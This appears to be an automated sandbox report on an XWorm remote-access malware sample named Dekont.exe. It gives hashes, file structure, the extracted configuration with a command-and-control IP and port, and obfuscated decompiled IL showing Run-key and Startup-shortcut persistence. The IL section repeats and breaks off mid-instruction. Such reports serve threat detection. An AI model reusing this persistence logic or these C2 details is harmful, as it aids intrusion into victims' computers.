Malicious
Malicious

c8ad61de141ffdca06e1282b1a828c9f

PE Executable
|
MD5: c8ad61de141ffdca06e1282b1a828c9f
|
Size: 73.22 KB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
c8ad61de141ffdca06e1282b1a828c9f
Sha1
0e736710d36e388015722a818c760ae9864f02e3
Sha256
4e378740e132d999256cd8c9c23e3b7fbd970d43fe940ef290bc139a6405f620
Sha384
4df502278ddf6a8bfc6e1dccd9cfec33701a4d65471a36598e196f3ebe7551356dcbe04dffc7905e317a76dae79a7540
Sha512
3a755c83946561c9dfb5d5eb549e759a65953211846c13b1cb2bc37a24bf093edd87fc42fde540587ab6b89cffbd966428d6e215d8332bffba867a243407cf57
SSDeep
1536:qgMh3y+M/pkWbB4rf+buoSxi8BRI/MDO50/vr:qbhKV4D+burIgOOL
TLSH
3D637E1877F60129E1FF6FF14DF53652DA36F6276903D61F2489038A2A13A88CD816F6

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
c8ad61de141ffdca06e1282b1a828c9f
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Malware Configuration - XWorm config.
Config. Field
 Value
Mutex

Z7L0vtJ1EfwYHchh
Hosts

108.181.154.141
Port

5555
KEY

<666666>
USBNM

<Xwormmm>
LoggerPath

%ProgramData%
family

xworm
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Dekont.exe
Full Name

Dekont.exe
EntryPoint

System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::SE2T5tjjm415Lh0g1Zw1PYjkkpIy5Wt4fQ6pe5Mk2RAuHscQDmz9vGx5nmriekapREj4vxNUYSf6f8MSU()
Scope Name

Dekont.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Dekont
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

329
Main Method

System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::SE2T5tjjm415Lh0g1Zw1PYjkkpIy5Wt4fQ6pe5Mk2RAuHscQDmz9vGx5nmriekapREj4vxNUYSf6f8MSU()
Main IL Instruction Count

242
Main IL

ldsfld System.Int32 vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ObQ5YviKK30JVFpgnanDUuHQDwjuGuk8LCB5NTzYQlqgrpzNfiFDxfVJ726yK2pQZM45J4OQwVkLqoGvx ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::sN8QxQyseV701imaY75kQs0kVz8PtnzaFMLJCZR7nI9EzdXYI8F11OVv0NOHuIvjtTr6l4cqOPAUnU3Qo call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::sN8QxQyseV701imaY75kQs0kVz8PtnzaFMLJCZR7nI9EzdXYI8F11OVv0NOHuIvjtTr6l4cqOPAUnU3Qo ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::u6M4S8ziQmxvYrWmpusRDCG1MMdf4q9i3gQvjdyLR6e6T1hvC0f5UUSHGBzmdWmKsetjOv4TfFnTwkyA4 call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::u6M4S8ziQmxvYrWmpusRDCG1MMdf4q9i3gQvjdyLR6e6T1hvC0f5UUSHGBzmdWmKsetjOv4TfFnTwkyA4 ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::XsBy6vJioI6i9zYSFNjVv9RsK8yta2ZqrPCuCH29x361nX5uxQOI9GziiU5yikZyQ1fRgC8HXE1jzsS9n call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::XsBy6vJioI6i9zYSFNjVv9RsK8yta2ZqrPCuCH29x361nX5uxQOI9GziiU5yikZyQ1fRgC8HXE1jzsS9n ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::trbBvEkONRB5lHoaVAkzkwz5TnT7ZSeFLdZv9G0fxV4u9wZwhbx99SSP2bHVmDk6CYzSxgeXphfdM69zE call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::trbBvEkONRB5lHoaVAkzkwz5TnT7ZSeFLdZv9G0fxV4u9wZwhbx99SSP2bHVmDk6CYzSxgeXphfdM69zE ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::PFh4DYMAZp4EQ8gSjWYjFYyEBfCtlw0fo79R1UrgyEq59JLjQPA465sble1J6Z3c9Ss8o9OCduj9TmH2t call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::PFh4DYMAZp4EQ8gSjWYjFYyEBfCtlw0fo79R1UrgyEq59JLjQPA465sble1J6Z3c9Ss8o9OCduj9TmH2t ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::tLS2sXMIebLxXpGHwO60vF2sZBeKlpNG9bpWjB3j61mFgpuUdl0747qP1Mu8CFKHGjbbBHQGUieZDNOys call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::tLS2sXMIebLxXpGHwO60vF2sZBeKlpNG9bpWjB3j61mFgpuUdl0747qP1Mu8CFKHGjbbBHQGUieZDNOys ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::gqRTUDUHE660ayMqTszPtkarCkyaKVL1eLTifWUnhrK77mD8KxQheYTaXcdQb0zCxwgsa8b7OL0mLqc7A call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::gqRTUDUHE660ayMqTszPtkarCkyaKVL1eLTifWUnhrK77mD8KxQheYTaXcdQb0zCxwgsa8b7OL0mLqc7A ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::TSNgTOow9OdiAlvG3Wc3sQwkbmXhho4mH01Y18Fq0zKcdaLcckc08FEWtNT6Faes5deEZD1ClzJqfu2kh call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::TSNgTOow9OdiAlvG3Wc3sQwkbmXhho4mH01Y18Fq0zKcdaLcckc08FEWtNT6Faes5deEZD1ClzJqfu2kh leave.s IL_00F3: call System.Boolean Stub.CxQLQp67FlPzepyxAIz3JLh::XbcwR50bqwic4uyssDrYvis() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00F3: call System.Boolean Stub.CxQLQp67FlPzepyxAIz3JLh::XbcwR50bqwic4uyssDrYvis() call System.Boolean Stub.CxQLQp67FlPzepyxAIz3JLh::XbcwR50bqwic4uyssDrYvis() brtrue.s IL_0100: ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X ldstr \ ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0142: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.CxQLQp67FlPzepyxAIz3JLh::m2RT8UUL3RxTWamV90y8Kbg call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0184: call My.St0YtaZcCoIBEGx3g2gwDEoB8I9Zs68HP6ZzqOtGcXnfiGtuVTjLYhwx35DjFgToUI4XgSnXmGlGBzhAv My.A7KCcGKxxKCWrUTypnK0zK8YviZypmjkewDEE6XfMfe3MbN3o3P6LEgu9KQ1ud51n3XXGo14SZSsqHUhU::yNeHGm7RhNINEVQNK9q1ZjsxB0vYmD6CHpi311rLSwULxGOmQg5qaxTLtTO7hidG8U8jkeCxtNDtJ0d2t() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0184: call My.St0YtaZcCoIBEGx3g2gwDEoB8I9Zs68HP6ZzqOtGcXnfiGtuVTjLYhwx35DjFgToUI4XgSnXmGlGBzhAv My.A7KCcGKxxKCWrUTypnK0zK8YviZypmjkewDEE6XfMfe3MbN3o3P6LEgu9KQ1ud51n3XXGo14SZSsqHUhU::yNeHGm7RhNINEVQNK9q1ZjsxB0vYmD6CHpi311rLSwULxGOmQg5qaxTLtTO7hidG8U8jkeCxtNDtJ0d2t() call My.St0YtaZcCoIBEGx3g2gwDEoB8I9Zs68HP6ZzqOtGcXnfiGtuVTjLYhwx35DjFgToUI4XgSnXmGlGBzhAv My.A7KCcGKxxKCWrUTypnK0zK8YviZypmjkewDEE6XfMfe3MbN3o3P6LEgu9KQ1ud51n3XXGo14SZSsqHUhU::yNeHGm7RhNINEVQNK9q1ZjsxB0vYmD6CHpi311rLSwULxGOmQg5qaxTLtTO7hidG8U8jkeCxtNDtJ0d2t() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_01BF: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BF: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_8 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_10 ldloc.s V_10 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_10 stloc.s V_11 ldloc.s V_11 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_12 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_12 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0244: stloc.s V_13 ldloc.s V_11 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_8 stloc.s V_13 ldloc.s V_13 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_13 ldloc.s V_8 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.CxQLQp67FlPzepyxAIz3JLh::VkZ65RBHibBhVA3IsOvwdAs leave.s IL_02C3: call System.Void Stub.CxQLQp67FlPzepyxAIz3JLh::354oBC6Pe9ehzOjDJTMXL91() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02C3: call System.Void Stub.CxQLQp67FlPzepyxAIz3JLh::354oBC6Pe9ehzOjDJTMXL91() call System.Void Stub.CxQLQp67FlPzepyxAIz3JLh::354oBC6Pe9ehzOjDJTMXL91() ldnull <null> ldftn System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::tAUeArU6meXFnF1zccFnABpc7ExOxCONg4KK8qSdGfAtIBwhvQNIZNv0iVZp6EMVoslQYLQ2BpKhxWiuT() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.5BBIShPZnt1OyZUsa9XPUhM::5bEqYAf9a1d56ZHnqu7Rj7n() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02EF: call System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::1opzHsJVc6jsl2o16rfUdWLPnvsx0zmkdAPP7q5uao53B1TTaWbG4NCRl0bVBc0UD7gf6Lw6tNJUwswlz() call System.Void Stub.ahppRljXGH6ceBXxNs4sa86::himotjXW13itm3Xlf6UcjgS() call System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::1opzHsJVc6jsl2o16rfUdWLPnvsx0zmkdAPP7q5uao53B1TTaWbG4NCRl0bVBc0UD7gf6Lw6tNJUwswlz() ldnull <null> ldftn System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::AJ08oxrlTE2qbs4vwRgYzB7() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::JisAvS4CMWbA3Ku0DbalXtI() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name

Dekont.exe
Full Name

Dekont.exe
EntryPoint

System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::SE2T5tjjm415Lh0g1Zw1PYjkkpIy5Wt4fQ6pe5Mk2RAuHscQDmz9vGx5nmriekapREj4vxNUYSf6f8MSU()
Scope Name

Dekont.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Dekont
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

329
Main Method

System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::SE2T5tjjm415Lh0g1Zw1PYjkkpIy5Wt4fQ6pe5Mk2RAuHscQDmz9vGx5nmriekapREj4vxNUYSf6f8MSU()
Main IL Instruction Count

242
Main IL

ldsfld System.Int32 vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ObQ5YviKK30JVFpgnanDUuHQDwjuGuk8LCB5NTzYQlqgrpzNfiFDxfVJ726yK2pQZM45J4OQwVkLqoGvx ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::sN8QxQyseV701imaY75kQs0kVz8PtnzaFMLJCZR7nI9EzdXYI8F11OVv0NOHuIvjtTr6l4cqOPAUnU3Qo call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::sN8QxQyseV701imaY75kQs0kVz8PtnzaFMLJCZR7nI9EzdXYI8F11OVv0NOHuIvjtTr6l4cqOPAUnU3Qo ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::u6M4S8ziQmxvYrWmpusRDCG1MMdf4q9i3gQvjdyLR6e6T1hvC0f5UUSHGBzmdWmKsetjOv4TfFnTwkyA4 call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::u6M4S8ziQmxvYrWmpusRDCG1MMdf4q9i3gQvjdyLR6e6T1hvC0f5UUSHGBzmdWmKsetjOv4TfFnTwkyA4 ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::XsBy6vJioI6i9zYSFNjVv9RsK8yta2ZqrPCuCH29x361nX5uxQOI9GziiU5yikZyQ1fRgC8HXE1jzsS9n call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::XsBy6vJioI6i9zYSFNjVv9RsK8yta2ZqrPCuCH29x361nX5uxQOI9GziiU5yikZyQ1fRgC8HXE1jzsS9n ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::trbBvEkONRB5lHoaVAkzkwz5TnT7ZSeFLdZv9G0fxV4u9wZwhbx99SSP2bHVmDk6CYzSxgeXphfdM69zE call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::trbBvEkONRB5lHoaVAkzkwz5TnT7ZSeFLdZv9G0fxV4u9wZwhbx99SSP2bHVmDk6CYzSxgeXphfdM69zE ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::PFh4DYMAZp4EQ8gSjWYjFYyEBfCtlw0fo79R1UrgyEq59JLjQPA465sble1J6Z3c9Ss8o9OCduj9TmH2t call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::PFh4DYMAZp4EQ8gSjWYjFYyEBfCtlw0fo79R1UrgyEq59JLjQPA465sble1J6Z3c9Ss8o9OCduj9TmH2t ldsfld System.String 